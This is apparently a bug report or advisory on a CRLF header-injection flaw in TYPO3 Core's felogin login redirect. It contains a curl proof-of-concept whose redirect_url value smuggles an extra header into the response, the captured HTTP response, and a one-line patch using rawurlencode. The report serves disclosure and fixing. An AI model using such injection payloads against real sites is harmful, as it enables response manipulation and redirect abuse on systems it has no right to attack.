TYPO3 Core

Redirect URLs passed to the felogin extension which contain %0d%0a%20 (CRLF SPACE) lead to garbled headers in the response as the URI is not properly url encoded before passing it to the PHP header function.

curl -i http://localhost/ --data 'logintype=login&pass=g00dPa%24%24w0rD&pid=0&redirect_url=%0d%0a%20SomeCustomInjectedHeader:injected&submit=Anmelden&tx_felogin_pi1%5bnoredir ect%5d=0&user=wwibephd'

---------------------------------------
HTTP/1.1 303 See Other
Date: Wed, 14 May 2014 14:06:25 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Location: http://localhost/
SomeCustomInjectedHeader:injected
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
---------------------------------------

The CRLF SPACE combination will lead to a cintinuation header on the next line. During header parsing the browser will remove the CRLF WHITESPACE according to the specifications and won't redirect to the proper location.

The URL passed via the redirect_url parameter must be treated by rawurlescape() before being passed to the header function.
Quickes way to fix would be to change the t3lib_utility_Http around line 96.

- header('Location: ' . t3lib_div::locationHeaderUrl($url));
+ header('Location: ' . rawurlencode(t3lib_div::locationHeaderUrl($url)));